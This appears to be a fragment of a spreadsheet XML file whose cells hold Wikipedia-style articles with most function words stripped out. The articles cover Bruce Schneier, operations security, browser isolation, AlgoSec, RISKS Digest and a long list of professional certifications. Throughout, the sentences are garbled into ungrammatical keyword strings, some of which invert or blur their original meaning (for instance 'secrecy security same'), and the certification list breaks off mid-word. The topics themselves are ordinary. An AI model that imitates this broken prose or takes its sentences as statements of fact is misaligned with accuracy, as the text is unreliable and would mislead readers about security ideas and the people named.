gripped minds many intelligent that, tried, could invent cipher could break", words secret writing", july 1841, edgar allan stated: "few persons made believe quite easy thing invent method secret writing shall baffle investigation. roundly asserted human ingenuity cannot concoct cipher human ingenuity cannot resolve."schneier also coined term "kid sister cryptography", writing preface applied cryptography that: there kinds cryptography world: cryptography stop sister reading files, cryptography stop major governments reading files. digital rights management schneier critical digital rights management (drm) said allows vendor increase lock-in. proper implementation control-based security user trusted computing difficult, security thing control.schneier insists "owning data different thinking data." full disclosure schneier proponent full disclosure, i.e. making security issues public. researchers public, things don’t fixed. companies security problem; problem. homeland security schneier said homeland security money spent intelligence, investigation, emergency response. defending broad threat terrorism generally better focusing specific potential terrorist plots. according schneier, analysis intelligence data difficult better ways deal global terrorism. human intelligence advantages automated computerized analysis, increasing amount intelligence data gathered help improve analysis process. agencies designed around fighting cold culture inhibits sharing information; practice sharing information important less security threat dealing decentralized poorly funded adversaries qaeda.regarding petn—the explosive become terrorists' weapon choice—schneier written swabs dogs detect also believes changes airport security since september 2001 done harm good defeated hawley, former head transportation security administration, economist online debate regarding issue. widely credited coining term "security theater" describe changes. fellow berkman center internet society harvard university, schneier exploring intersection security, technology, people, emphasis power. movie plot threat "movie-plot threat" term schneier coined refers specific dramatic terrorist attack scenarios, reminiscent behavior terrorists movies, rather terrorists actually real world. security measures created protect movie plot threats provide higher level real security, preparation pays terrorists choose particular avenue attack, even feasible. real-world terrorists would also likely notice highly specific security measures, simply attack way. specificity movie plot threats gives power public imagination, however, even extremely unrealistic security theater countermeasures receive strong support public legislators. among many examples movie plot threats, schneier described banning baby carriers subways, fear contain explosives. starting april 2006, schneier annual contest create fantastic movie-plot threat. 2015, february 2022 last one, mentioned contest course. system design schneier criticized security approaches prevent malicious incursion, instead arguing designing systems fail well important. designer system underestimate capabilities attacker, technology make possible future things possible present. under kerckhoffs's principle, need parts cryptographic system remain secret increases fragility system; whether details system obscured depends upon availability persons make information beneficial uses versus potential attackers misuse information. secrecy security same, even though seem way. only security relies secrecy; good security works even details public. cryptographic algorithms schneier involved creation many cryptographic algorithms. publications schneier, bruce. applied cryptography, john wiley sons, 1994. isbn 0-471-59756-2 schneier, bruce. protect your macintosh, peachpit press, 1994. isbn 1-56609-101-2 schneier, bruce. e-mail security, john wiley sons, 1995. isbn 0-471-05318-x schneier, bruce. applied cryptography, second edition, john wiley sons, 1996. isbn 0-471-11709-9 schneier, bruce; kelsey, john; whiting, doug; wagner, david; hall, chris; ferguson, niels. twofish encryption algorithm, john wiley sons, 1996. isbn 0-471-35381-7 schneier, bruce; banisar, david. electronic privacy papers, john wiley sons, 1997. isbn 0-471-12297-1 schneier, bruce. secrets lies: digital security networked world, john wiley sons, 2000. isbn 0-471-25311-1 schneier, bruce. beyond fear: thinking sensibly about security uncertain world, copernicus books, 2003. isbn 0-387-02620-7 ferguson, niels; schneier, bruce. practical cryptography, john wiley sons, 2003. isbn 0-471-22357-3 schneier, bruce. secrets lies: digital security networked world, john wiley sons, 2004. isbn 978-0-471-45380-2 schneier, bruce. schneier security, john wiley sons, 2008. isbn 978-0-470-39535-6 ferguson, niels; schneier, bruce; kohno, tadayoshi. cryptography engineering, john wiley sons, 2010. isbn 978-0-470-47424-2 schneier, bruce. liars outliers: enabling trust society needs thrive, john wiley sons, 2012. isbn 978-1-118-14330-8 schneier, bruce. carry sound advice schneier security, john wiley sons, 2013. isbn 978-1118790816 schneier, bruce. data goliath: hidden battles collect your data control your world, norton company, 2015. isbn 978-0-393-24481-6 schneier, bruce. click here kill everybody: security survival hyper-connected world, norton company, 2018. isbn 978-0-393-60888-5 schneier, bruce. have root: even more advice schneier security, john wiley sons, 2019. isbn 978-1119643012 activism schneier board member electronic frontier foundation. also attack tree failing badly snake (cryptography) alice references external links personal website, schneier.com bruce schneier's books, schneier.com/books.html profile bruce schneier politico magazine "glenn greenwald's encryption guru," alex carp, march 2014 talking security bruce almighty schneier 2009 conference, video schneier participating cryptographer's panel, april 2009, moscone center, francisco bruce schneier real radio, bruce talks dicello legal news talk radio program, real radio, case involving philadelphia school allegedly spied students webcam computers (podcasts/saturday february 2010). roberts, russ (june 2013). "schneier power, internet, security". econtalk. library economics liberty. bruce schneier google, june 2013. schneier discusses various aspects internet computing global geo-politics including trust, power relations, control, cooperative systems, ethics, laws, security technologies. minutes) bruce schneier interviewed well lebkowsky, august 2012</t>
  </si>
  <si>
    <t>Operations security</t>
  </si>
  <si>
    <t>operations security (opsec) process identifies critical information determine friendly actions observed enemy intelligence, determines information obtained adversaries could interpreted useful them, executes selected measures eliminate reduce adversary exploitation friendly critical information. general sense, opsec process protecting individual pieces data could grouped together give bigger picture (called aggregation). opsec protection critical information deemed mission-essential military commanders, senior leaders, management decision-making bodies. process results development countermeasures, include technical non-technical measures email encryption software, taking precautions eavesdropping, paying close attention picture taken (such items background), talking openly social media sites information unit, activity organization's critical information list. term "operations security" coined united states military vietnam war. process opsec five-step iterative process assists organization identifying specific pieces information requiring protection employing measures protect them: identification critical information: critical information information friendly intentions, capabilities activities allow adversary plan effectively disrupt operations. u.s. army regulation 530-1 redefined critical information four broad categories, using acronym cali capabilities, activities, limitations (including vulnerabilities), intentions. this step results creation critical information list (cil). this allows organization focus resources vital information, rather attempting protect classified sensitive unclassified information. critical information include, limited military deployment schedules, internal organizational information, details security measures, etc. analysis threats: threat comes adversary individual group attempt disrupt compromise friendly activity. threat divided adversaries intent capability. greater combined intent capability adversary, greater threat. this step uses multiple sources, intelligence activities, enforcement, open source information identify likely adversaries planned operation prioritize degree threat. analysis vulnerabilities: examining aspect planned operation identify opsec indicators could reveal critical information comparing indicators adversary's intelligence collection capabilities identified previous action. threat thought strength adversaries, vulnerability thought weakness friendly organizations. assessment risk: first, planners analyze vulnerabilities identified previous action identify possible opsec measures vulnerability. second, specific opsec measures selected execution based upon risk assessment done commander staff. risk calculated based probability critical information release impact release occurs. probability subdivided level threat level vulnerability. core premise subdivision probability compromise greatest threat capable dedicated, friendly organizations simultaneously exposed. application appropriate opsec measures: command implements opsec measures selected assessment risk action case planned future operations activities, includes measures specific opsec plans. countermeasures must continually monitored ensure continue protect current information relevant threats. u.s. army regulation 530-1 refers "measures" overarching term, categories "action control" (controlling one's actions); "countermeasures" (countering adversary intelligence collection); "counteranalysis" (creating difficulty adversary analysts seeking predict friendly intent) tools help opsec professional protect critical information.an opsec assessment formal application process existing operation activity multidisciplinary team experts. assessments identify requirements additional opsec measures required changes existing ones. additionally, opsec planners, working closely public affairs personnel, must develop essential elements friendly information (eefi) used preclude inadvertent public disclosure critical sensitive information. term "eefi" phased favor "critical information", affected agencies term, minimizing confusion. history vietnam 1966, united states admiral ulysses sharp established multidisciplinary security team investigate failure certain combat operations vietnam war. this operation dubbed operation purple dragon, included personnel national security agency department defense.when operation concluded, purple dragon team codified recommendations. they called process "operations security" order distinguish process existing processes ensure continued inter-agency support. nsdd 1988, president ronald reagan signed national security decision directive (nsdd) 298. this document established national operations security program named director national security agency executive agent inter-agency opsec support. this document also established interagency opsec support staff (ioss). international private-sector application although originally developed military methodology, operations security adopted worldwide military private-sector operations. 1992, north atlantic treaty organization (nato) added opsec glossary terms definitions.the private sector also adopted opsec defensive measure competitive intelligence collection efforts.military private-sector security information firms often require opsec professionals. certification often initially obtained military governmental organizations, u.s. army opsec support element u.s. navy opsec support team u.s. marine opsec support team u.s. force opsec support team u.s. coast guard office security policy management joint opsec support element. interagency opsec support staff. other measures impact opsec communications security (comsec) counter-intelligence (ci) information security (infosec) signal security (sigsec) transmission security (transec) cybersecurity also official only fouo information security intelligence cycle security security security culture sensitive unclassified controlled unclassified information social engineering references external links espionage target film operational security youtube u.s. government opsec site operations security professionals association national security decision directive purple dragon, origin development united states opsec program, nsa, 1993. operations security 3-13.3) u.s. operations security doctrine. "bin laden trail 'stone cold'". washington post. september 2006. "after decade with west, al-qaeda still impervious spies". washington post. march 2008. conduct opsec assessment</t>
  </si>
  <si>
    <t>Browser isolation</t>
  </si>
  <si>
    <t>browser isolation cybersecurity model aims physically isolate internet user's browsing activity (and associated cyber risks) away local networks infrastructure. browser isolation technologies approach model different ways, seek achieve goal, effective isolation browser user's browsing activity method securing browsers browser-based security exploits, well web-borne threats ransomware malware. when browser isolation technology delivered customers cloud hosted service, known remote browser isolation (rbi), model enables organizations deploy browser isolation solution users without managing associated server infrastructure. there also client side approaches browser isolation, based client-side hypervisors, depend servers order isolate users browsing activity associated risks, instead activity virtually isolated local host machine. client-side solutions break security physical isolation model, allow user avoid server overhead costs associated remote browser isolation solutions. mechanism browser isolation typically leverages virtualization containerization technology isolate users browsing activity away endpoint device significantly reducing attack surface rogue links files. browser isolation isolate browsing hosts high-risk behaviors away mission-critical data infrastructure. browser isolation process physically isolate user's browsing activity away local networks infrastructure, isolating malware browser based cyber-attacks process still granting full access. market 2017, american research group gartner identified remote browser (browser isolation) technologies security. gartner report also forecast enterprises would actively begin isolate internet browsing reduce impact cyber attacks coming three years. according market research media, remote browser isolation (rbi) market forecast reach billion 2024, growing cagr period 2019–2024. comparison techniques unlike traditional security approaches antivirus software secure gateways, browser isolation zero trust approach rely filtering content based known threat patterns signatures. traditional approaches can't handle 0-day attacks since threat patterns unknown. rather, browser isolation approach treats websites content explicitly whitelisted untrusted, isolates local device virtual environment container virtual machine. web-based files rendered remotely users access within browser, without downloading them. alternatively, files sanitized within virtual environment, using file cleansing technologies content disarm reconstruction (cdr), allowing secure file downloads user device. effectiveness typically browser isolation solutions provide users 'disposable' (non-persistent) browser environments, browsing session closed times out, entire browser environment reset known good state simply discarded. malicious code encountered session thus prevented reaching endpoint persisting within network, regardless whether threat detected. way, browser isolation proactively combats known, unknown zero-day threats, effectively complementing security measures contributing defense-in-depth, layered approach security. history browser isolation began evolution 'security physical isolation' cybersecurity model also known air-gap model security professionals, physically isolating critical networks, users infrastructures cybersecurity purposes decades. although techniques breach 'air-gapped' systems exist, typically require physical access close proximity air-gapped system order effective. air-gap makes infiltration systems public internet extremely difficult, impossible without physical access system first commercial browser isolation platforms leveraged national nuclear security administration lawrence livermore national laboratory, alamos national laboratory sandia national laboratories 2009, browser isolation platforms based virtualization used deliver non-persistent virtual desktops thousands federal government users. june 2018, defense information systems agency (disa) announced request information "cloud-based internet isolation" solution part endpoint security portfolio. puts "the service would redirect internet browsing user’s desktop remote server, external department defense information network." time, largest known project browser isolation, seeking cloud based service leveraging concurrent (simultaneous) licenses ~60% total user base (3.1 million users)." also malware internet safety browser security antivirus software references</t>
  </si>
  <si>
    <t>AlgoSec</t>
  </si>
  <si>
    <t>algosec network security software company based jersey united states. organization provides software network security policy management, also known firewall policy management.the company's products designed automate management enforcement security policies across firewalls, routers, virtual private networks (vpns), related security devices. they intended manage configuration security systems, identify vulnerabilities, test systems security policies, ensure compliance regulations pci-dss sarbanes-oxley. history algosec's core technology developed 2001 prof. avishai wool team researchers bell laboratories. wool yuval baron founded algosec november 2004. time, company headquartered reston, virginia.in 2010, algosec moved headquarters north american sales office roswell, georgia (atlanta area). 2012, algosec moved headquarters ridgefield park, jersey. today, addition boston office, algosec sales offices london singapore, research development center petah tikva, israel london.in 2020, company signed partnership agreement cisco.algosec's customers include enterprises, managed service providers, auditors, consultants several countries. products algosec delivers products standalone modules integrated suite, algosec security management suite, includes: algosec firewall analyzer: automates auditing analysis firewalls, routers, vpns security devices algosec fireflow: automates security change management workflow algosec cloudflow: offers visibility management public cloud assets algosec appviz: vsualizes analyses network applications references external links official website peerspot review help security article</t>
  </si>
  <si>
    <t>RISKS Digest</t>
  </si>
  <si>
    <t>risks digest forum risks public computers related systems online periodical published since 1985 committee computers public policy association computing machinery. editor peter neumann. moderated forum concerned security safety computers, software, technological systems. security, risk, taken broadly; risks concerned merely so-called security holes software, unintended consequences hazards stemming design lack thereof) automated systems. other recurring subjects include cryptography effects technically ill-considered public policies. risks also publishes announcements calls papers various technical conferences, technical book reviews (usually slade, though occasionally others). although risks forum computer science association, contributions readable informative anyone interest subject. heavily read system administrators, computer security managers, well computer scientists engineers. risks digest published frequent irregular schedule moderated usenet newsgroup comp.risks, exists solely carry digest. summaries forum appear columns edited neumann sigsoft software engineering notes (sen) communications (cacm). references external links risks digest archive risks digest (usenet newsgroup comp.risks) google groups interface comp.risks</t>
  </si>
  <si>
    <t>Professional certification</t>
  </si>
  <si>
    <t>professional certification, trade certification, professional designation, often called simply certification qualification, designation earned person assure qualification perform task. certifications post-nominal letters acknowledgement educational achievement, agency appointed safeguard public interest. overview certification third-party attestation individual's level knowledge proficiency certain industry profession. they granted authorities field, professional societies universities, private certificate-granting agencies. most certifications time-limited; expire period time (e.g., lifetime product required certification use), others renewed indefinitely long certain requirements met. renewal usually requires ongoing education remain up-to-date advancements field, evidenced earning specified number continuing education credits (cecs), continuing education units (ceus), approved professional development courses. many certification programs affiliated professional associations, trade organizations, private vendors interested raising industry standards. certificate programs often created endorsed professional associations, typically completely independent membership organizations. certifications common fields aviation, construction, technology, environment, industrial sectors, well healthcare, business, real estate, finance. according guide national professional certification programs (1997) phillip barnhart, "certifications portable, since depend company's definition certain job" provide potential employers impartial, third-party endorsement individual's professional knowledge experience".certification different professional licensure. united states, licenses typically issued state agencies, whereas certifications usually awarded professional societies educational institutes. obtaining certificate voluntary fields, others, certification government-accredited agency legally required perform certain jobs tasks. countries, licenses typically granted professional societies universities require certificate three five years thereafter. assessment process certification comprehensive licensure, though sometimes assessment process similar even same, despite differing terms legal status. american national standards institute (ansi) defines standard certifying agency meeting following requirements: delivering assessment based industry knowledge independent training courses course providers granting time-limited credential anyone meets assessment standardsthe institute credentialing excellence (ice) u.s.-based organization sets standards accreditation personnel certification certificate programs based standards educational psychological testing, joint publication american educational research association (aera), american psychological association (apa), national council measurement education (ncme). many members association test publishers (atp) also certification organizations. categorization there three general types certification. listed order development level portability, are: corporate (internal), product-specific, profession-wide. corporate, "internal" certifications, made corporation low-stakes organization internal purposes. example, corporation might require one-day training course sales personnel, receive certificate. while certificate limited portability corporations, example simple develop. product-specific certifications involved, intended referenced product across applications. this approach prevalent information technology (it) industry, personnel certified version software hardware. this type certification portable across locations (for example, different corporations software), across products. another example could certifications issued shipping personnel, international standards even recognition certification body, international maritime organization (imo). general type certification profession-wide. certification medical profession often offered particular specialties. order apply professional standards, increase level practice, protect public, professional organization might establish certification. this intended portable places certified professional might work. course, generalization increases cost program; process establish legally defensible assessment entire profession extensive. example certified public accountant (cpa), would certified corporation piece accountancy software general work profession. certification expert professional certificates awarded tertiary education providers many tertiary education providers grant professional certificates award completion educational program. curriculum professional certificate often focused subject matter. many professional certificates curriculum master's degrees subject. many professional certificates offer courses master's degrees subject, require student take fewer total courses complete program. some professional certificates curriculum closely resembles baccalaureate major field. typical professional certificate program class-hours size. uncommon program larger smaller that. most professional certificate programs open enrollment, admissions processes. universities professional certificates subclass refer advanced professional certificates. some commonly offered professional certificates include: professional certificate accounting (pca) professional certificate accounting finance (pcaf) professional certificate taxation (pcit) professional certificate transfer pricing (pcitp) professional certificate contract management (pccm) professional certificate customer relationship management (pccrm) professional certificate facility management (pcfm) professional certificate financial planning (pcfp) professional certificate graphic design (pcgd) professional certificate small business management (pcsbm) professional certificate human resources (pchr) professional certificate marketing (pcm) professional certificate digital marketing (pcdm) professional certificate paralegal studies (pcps) professional certificate project management (pcpm) professional certificate supply chain management (pcscm) professional certificate store management (pcsm) professional certificate materials management (pcmm) professional certificate technical communication (pctc) advanced professional certificate advanced professional certificates professional credentials designed help professionals enhance performance marketability respective fields. many countries, certificates qualifications higher education. united states, certificate offered institute higher education. these certificates usually signify student reached standard knowledge certain vocational subject. certificate programs completed quickly associate degrees often general education requirements. advanced professional certificate result educational process designed individuals. certificates designed newcomers industry well seasoned professionals. certificates awarded educational program academic institution. completion certificate program indicates completion course series courses specific concentration different educational degree program. course content advanced certificate forth variety sources i.e. faculty, committee, instructors, subject matter experts related field. goal advanced professional certificate professionals demonstrate knowledge course content period time. institutions offer advance professional certificates various fields industries include: georgetown university lesley university network kings york university john's university stanford university university francisco academy business school executive education faculty training qualifications certification board institute certified accountants academy archived september 2020 wayback machine areas certification accountancy, auditing finance there many professional bodies accountants auditors throughout world; legally recognized jurisdictions. public accountants accountancy control experts legally certified different jurisdictions work public practices, certifying accounts statutory auditors, eventually selling advice services individuals businesses. today, however, many work within private corporations, financial industry, government bodies. accounting external auditing accountancy qualifications regulation (chartered professional accountant), unified accounting designation canada conferred canada. chartered accountant conferred institute chartered accountants india. institute chartered accountants within commonwealth e.g. australia zealand, south africa, canada (before merger cpa). with mutual recognition aca, (chartered accountant) conferred institutes chartered accountants various territories, namely united kingdom great britain northern ireland republic ireland. acma fcma (associate fellow chartered management accountant) conferred chartered institute management accountants (uk) associate fellow chartered certified accountant (acca fcca) conferred association chartered certified accountants (uk) (associate fellow incorporated financial accountant) conferred institute financial accountants (uk) aaia faia (associate fellow international accountant) conferred association international accountants mipa fipa (member fellow institute public accountants designation "public accountant") conferred institute public accountants (australia) (certified public accountant) conferred state accountancy boards hong-kong, canada (certified management accountant) conferred institute certified management accountants (icma australia), institute management accountants (ima (chartered cost controllers) issued conferred american academy financial management certifying board (aafm) (certified finance specialist) conferred internal auditing fraud combat caap (certified agile auditor professional) awarded crisk academy proficiency agile auditing ccae (certified chief audit executive) awarded crisk academy proficiency starting running internal audit department corcm (certification objective-centric risk certainty management) awarded crisk academy cpia (certified practitioner internal audit) awarded crisk academy proficiency internal auditing crbia (certified risk-based internal auditor) awarded crisk academy proficiency risk-based internal auditing (certified internal auditor): ccsa, certification control self assessment; cgap, certified government auditing professional; crma, certification risk management assurance; qial, qualification internal audit leadership, conferred internationally recognized institute internal auditors (iia) headquartered lake mary, florida, chapters many countries (certified fraud examiner) conferred association certified fraud examiners (acfe) headquartered texas chapters many countries (certified financial forensics) awarded american institute cpas cisa (certified information systems auditor) awarded information systems audit control association headquartered chapters many countries cams (certified anti-money laundering specialist) offered association certified anti-money laundering specialists (acams) advanced cams cgss (certified global sanctions specialist) conferred association certified anti-money laundering specialists (acams) (certified strategic auditor) conferred association certified strategic auditors (acsa) https://www.acsaglobal.com iaccp (investment adviser certified compliance professional) conferred investment adviser association (iaa) national regulatory services (nrs) cperm (certified professional enterprise risk management) conferred academy professional certification company (apc) endorsed hksarg finance (certified finance specialist) conferred (chartered financial analyst) conferred institute (cfa) chfm chartered financial manager conferred international board standards ciia (certified international investment analyst) conferred association certified international investment analysts (aciia) iaccp (investment adviser certified compliance professional) conferred investment adviser association (iaa) national regulatory services (nrs) investments (certified finance specialist) conferred (chartered financial analyst) conferred institute (cfa) chfm chartered financial manager conferred international board standards cipm (certificate investment performance measurement) conferred institute (cfa) ciia (certified international investment analyst) conferred association certified international investment analysts (aciia) (accredited senior appraiser), (accredited member), ceiv (certified entity intangible valuations) conferred american society appraisers (chartered business valuator) conferred institute. (certified valuation analyst) conferred nacva. caia (chartered alternative investment analyst) conferred caia association iaccp (investment adviser certified compliance professional) conferred investment adviser association (iaa) national regulatory services (nrs) (financial risk manager) conferred global association risk professionals (garp) (professional risk manager) conferred professional risk managers' international association (prmia) fmva (financial modeling valuation analyst) conferred corporate finance institute (cfi). (certificate quantitative finance), conferred institute payroll (certified payroll professional) (fundamental payroll specialist) conferred american payroll association. payroll compliance practitioner (pcp) certified payroll manager (cpm) conferred national payroll institute personal finance (certified finance specialist) conferred (chartered financial analyst) conferred institute (cfa) chfm chartered financial manager conferred international board standards (certified financial planner) conferred certified financial planner board standards financial planning standards board (certified credit professional) issued credit management professionals canada credit institute canada (enrolled agent) internal revenue service (irs) (certified financial consultant) conferred institute financial consultants public finance ccmt (certified california municipal treasurer) conferred california municipal treasurers association (cmta) cgap (certified government auditing professional) conferred institute internal auditors, based government auditing standards (yellow book) additionally coso, standards intosai issai standards recognized worldwide public finance cdfm (certified defense financial manager) conferred american society military comptrollers (asmc) (certified financial officer) conferred carl vinson institute government university georgia cgfm (certified government financial manager) conferred association government accountants (aga) cgat (certified governmental accounting technician), conferred government finance officers association alabama cgfo (certified government finance officer) conferred government finance officers association texas (gfoat) cgfo (certified government finance officer), conferred florida government finance officers association (fgfoa) cgfo (certified government finance officer) conferred louisiana government finance officers association cmfo (certified municipal finance officer) conferred government finance officers jersey, rutgers university, state jersey cmfo (certified municipal finance officer) conferred tennessee comptroller treasury municipal technical advisory service cpfo (certified public finance officer) conferred government finance officers association cpfa (certified public finance administrator) conferred association public treasurers united states canada (aptusc) (government finance officer) conferred government finance officers association south carolina (gfoasc) north carolina local governmental finance officer conferred north carolina government finance officers association north carolina association county finance officers aging services certified aging place specialist (caps) certified daily money managers certified elder certified living place (clipp) certified senior advisor (csa) certified at-risk adult crime tactics specialist (cacts) cognitive care certification (ccc) architecture (member, american institute architects) conferred american institute architects faia (fellow, american institute architects) conferred american institute architects (registered architect) conferred national council architecture registration boards ncarb (certified) issued national council architecture registration boards allows state-state reciprocity. archival science, information privacy, records management (certified archivist), conferred academy certified archivists (certified information professional) conferred aiim cipm (certified information privacy manager) conferred international association privacy professionals cipp (certified information privacy professional) conferred international association privacy professionals cipt (certified information privacy technologist) conferred international association privacy professionals (certified records analyst) conferred institute certified records managers (certified records manager) conferred institute certified records managers (information governance professional) conferred arma international aviation aviators certified theoretical in-flight examinations. requirements certifications quite equal countries regulated national aviation authority. existing certificates pilot licenses are: (sport pilot license) conferred (federal aviation administration) (private pilot license) conferred (federal aviation administration) (joint aviation authorities) (commercial pilot licence) conferred (federal aviation administration) (joint aviation authorities) (airline transport pilot) conferred (federal aviation administration) (joint aviation authorities)licensing categories require examinations also minimum number flight hours. categories available fixed-wing aircraft (airplanes) rotatory-wing aircraft (helicopters). within category, aviators also obtain certifications instrument flight rules (ifr) multi-engine aircraft turbojet engines engines experimental aircraft amphibious aircraft seaplanesusually, aviators must certified also books type model aircraft allowed fly. currency checks well regular medical check-ups frequency months, months, months, depending type flying permitted, obligatory. aviator holding: valid pilot license valid medical certificate valid certifications type aircraft type flight.in europe, ansp, atco ansp technicians certified according eurocontrol safety regulatory requirement (esarrs) (according regulation 2096/2005 "common requirements"). biomedical (biomedical electronics technician) conferred electronics technicians association biet (biomedical imaging electronics technician) conferred electronics technicians association business (certified strategic auditor) conferred association certified strategic auditors (acsa) (certified strategic manager) conferred cpsm (certified professional supply management) conferred institute supply management (ism) cpsd (certified professional supplier diversity) conferred institute supply management (ism) chiropractic communications united states, several communications certifications conferred electronics technicians association. computer technology certification often used professions software engineering information technology. citp (chartered professional) conferred british computer society, institution engineering technology professional engineering institutions commonwealth contract management cpcm (certified professional contract manager) conferred national contract management association. (commercial project manager) conferred commercial officers group. cpsm (certified professional supply management) conferred institute supply management (ism) dance conferred international dance council unesco, international certification dance studies awarded students completed hours classes specific form dance level another hours required level till level this international certification dance since international dance council official body forms dance; usually given addition local national certificates, colloquially called "the dancer's passport". students cannot apply certification directly school apply behalf. this certification awarded free charge, cost membership fees. international dance council unesco administers international certification dance studies. data management certified data management professional (cdmp) dama international. dentistry electronics united states, several electronics certifications provided electronics technicians association. emergency management federal emergency management agency's offers credentials training opportunities united states citizens. students employed fema federal employees programs. advance professional series (aps) credential continuity excellence series, level critical infrastructure security resilience disaster field training operations (dfto) emergency management professional program (empp) executive fire officer program (efop) integrated emergency management courses (iemc) master exercise practitioner program (mepp) master trainer program (mtp) professional development series (pds) credential virtual table exercise (vttx) series engineering professional engineering planning, designing, composing, measuring, evaluating, inspecting, advising, reporting, directing supervising, managing foregoing, requires application engineering principles concerns safeguarding life, health, property, economic interests, public interest environment. p.eng. (professional engineer), conferred provincial licensing bodies canada. p.eng. (professional engineer), conferred board engineers malaysia (bem) malaysia. (professional engineer), conferred pakistan engineering council (pec) state licensing bodies united states. (power engineer), conferred provincial safety authorities canada. (european engineer), conferred european federation national engineering associations (feani). c.eng. (chartered engineer), conferred professional engineering institutions commonwealth. smieee (senior member ieee), professional designation throughout united states. (certified engineering technologist) asct (applied science technologist), conferred provincial licensing bodies canada. society petroleum engineers certificate program whereby certifies technical knowledge petroleum engineers. certification granted based examination conjunction experience applicant. event planning event planning includes budgeting, scheduling, site selection, acquiring necessary permits, coordinating transportation parking, arranging speakers entertainers, arranging decor, event security, catering, coordinating third-party vendors, emergency plans. common event planning certifications include: cmp: certified meeting professional csep: certified special events professional cpce: certified professional catering events cgmp: certified government meeting professional cwep: certified wedding event planner facility management facility management defined aspect engineering management science deals planning, designing, coordination space maintenance built environment enhance quality service management system. service quality system includes activities like security, maintenance, catering, external well internal cleaning. general, also coordination harmonization various specialist disciplines create best possible working environment staff. facility management interdisciplinary field devoted coordination space, infrastructure, people organization, often associated administration office blocks, arenas, schools, convention centers, shopping complexes, hospitals, hotels, etc. however, facilitates wider range activities business services referred non-core functions. fmp- facility management professional cfm- certified facility manager sfp- sustainability facility professional warehousing management warehouse management system (wms) part supply chain primarily aims control movement storage materials within warehouse process associated transactions, including shipping, receiving, putaway picking. systems also direct optimize stock putaway based real-time information status utilization. monitors progress products warehouse. involves physical warehouse infrastructure, tracking systems, communication product stations.more precisely, warehouse management involves receipt, storage movement goods, (normally finished goods), intermediate storage locations final customer. multi-echelon model distribution, multiple levels warehouses. this includes central warehouse, regional warehouses (serviced central warehouse) potentially retail warehouses (serviced regional warehouses). environment cenvp certified environmental practitioner australia zealand (cenvp) chartered environmentalist (cenv), society environment (uk) miema full member institute environmental management assessment (iema) fiema fellow institute environmental management assessment (iema) environmental health cphi(c) certified public health inspector (canada) explosive atmospheres iecex covers specialized field explosion protection associated equipment areas flammable gases, liquids combustible dusts present. this system provides assurance equipment manufactured meet safety standards, services installation, repair overhaul also comply international standards 60079 series. unece (united nations economic commission europe), cited iecex example practice model verification conformity standards, european smaller countries certification schemes equipment. published "common regulatory framework" suggestion countries implementing certification program explosive atmospheres' segment. fiber optics data cabling rcdd (registered communications distribution designer) bicsi (data cabling installer) conferred electronics technicians association (fiber optics installer) conferred electronics technicians association (fiber optics technician) conferred electronics technicians association fot-osp (fiber optics technician-outside plant) conferred electronics technicians association (fiber optics designer) conferred electronics technicians association (termination testing technician) conferred electronics technicians association genealogy (accredited genealogist) conferred international commission accreditation professional genealogists (icapgen). (certified genealogist) conferred board certification genealogists (bcg). (certified genealogical lecturer) conferred board certification genealogists (bcg). health leadership (certified health executive) conferred canadian college health leaders (cchl) human resources aphr (associate professional human resources) conferred human resources certification institute (professional human resources) conferred human resources certification institute sphr (senior professional human resources) conferred human resources certification institute shrm-cp (society human resources management certified professional) conferred society human resources management shrm-scp (society human resources management senior certified professional) conferred society human resources management hospitality tourism (certified hotel administrator) conferred american hotel lodging association (certified meeting professional) conferred convention industry council (certified exhibition management) conferred international association exhibitions events insurance risk management united states, insurance professionals licensed separately state. many individuals seek certifications distinguish peers. american college financial services: chartered life underwriter (clu) chartered financial consultant (chfc) american institute chartered property casualty underwriters (the institutes): chartered property casualty underwriter (cpcu) associate risk management (arm) national alliance insurance education research administers certified insurance counselor (cic) professional liability underwriting society (plus) administers registered professional liability underwriter (rplu). language education tesol large field employment widely varying degrees regulation. most provision worldwide state school system individual country, such, instructors tend trained primary- secondary school teachers native speakers language pupils, english. though native speakers english working non-english speaking countries capacity years, last twenty-five years widespread focus training particularly field. previously, workers sort people engaging backpacker tourism hoping earn extra travel money well-educated professionals fields volunteering, retired people. these sort people certainly still found, many consider tesol main profession. problems facing full-time teachers absence international governing body certification licensure english language teachers. however, cambridge university subsidiary body ucles pioneers trying degree accountability quality control consumers english courses, celta delta programs. trinity college london equivalent programs, certtesol ltcl diptesol. they offer initial certificates teaching, candidates trained language awareness classroom techniques, given chance practice teaching, feedback reported. both institutions follow-up professional diploma, usually taken year field. although initial certificate available anyone high school education, diploma meant post-graduate qualification fact incorporated master's degree program. legal affairs increasing number attorneys choosing recognized special expertise certain fields law. according american association, lawyer certified specialist recognized independent professional certifying organization enhanced level skill expertise, well substantial involvement established legal specialty. these organizations require lawyer demonstrate special training, experience knowledge ensure lawyer's recognition meaningful reliable. lawyer conduct regard specialty certification regulated states. legal administrators vary day-to-day responsibilities requirements. association legal administrators (ala) credentialing body certified legal manager (clm) certification program. clms recognized administrators passed comprehensive examination eligibility requirements.: librarians australia, alia (australian library information association) certifies librarians library technicians. distinguished librarians completed high level professional learning awarded distinguished certified professional award. prior 2013, award known associate fellows. zealand, accrediting body lianza (library information association zealand aotearoa herenga aotearoa). lianza accredit prominent librarians three levels, fellows, life members associates. logistics transport logistician profession logistics transport sectors, including sea, air, land rail modes. professional qualification logisticians usually carries post-nominal letters. certification granting bodies include, limited institute supply management (ism), association operations management (apics), chartered institute logistics transport (cilt), international society logistics (sole), canadian institute traffic transportation (citt), allied council commerce logistics (accl). marketing cdmp (certified digital marketing professional), conferred digital marketing institute. (certified marketing executive), conferred sales marketing executives international, inc.. social media marketing certification, digital marketing master certification, certification, conferred boot camp digital ministers churches process various religious titles. protestant churches typically require masters divinity, accreditation denomination ordination local church order minister become "reverend". those qualifications also give government authorization solemnize marriages. medicine board certification process physician united states documents written, practical computer based testing, illustrating mastery knowledge skills define particular area medical specialization. american board medical specialties, not-for-profit organization, assists approved medical specialty boards development standards ongoing evaluation certification physicians. medical specialty certification united states voluntary process. while medical licensure sets minimum competency requirements diagnose treat patients, specialty specific. board certification demonstrates physician's exceptional expertise particular specialty sub-specialty medical practice. patients, physicians, health care providers, insurers quality organizations regard certification important measure physician's knowledge, experience skills provide quality health care within given specialty. other professional certifications include certifications medical licenses, membership royal college physicians, fellowship royal college physicians surgeons canada, nursing board certification, diplomas social work. commission certification geriatric pharmacy certifies pharmacists knowledgeable principles geriatric pharmacotherapy provision pharmaceutical care elderly. additional certifying bodies relating medical field include: royal australian zealand college radiologists american college em</t>
  </si>
  <si>
    <t>Brown Safe Manufacturing</t>
  </si>
  <si>
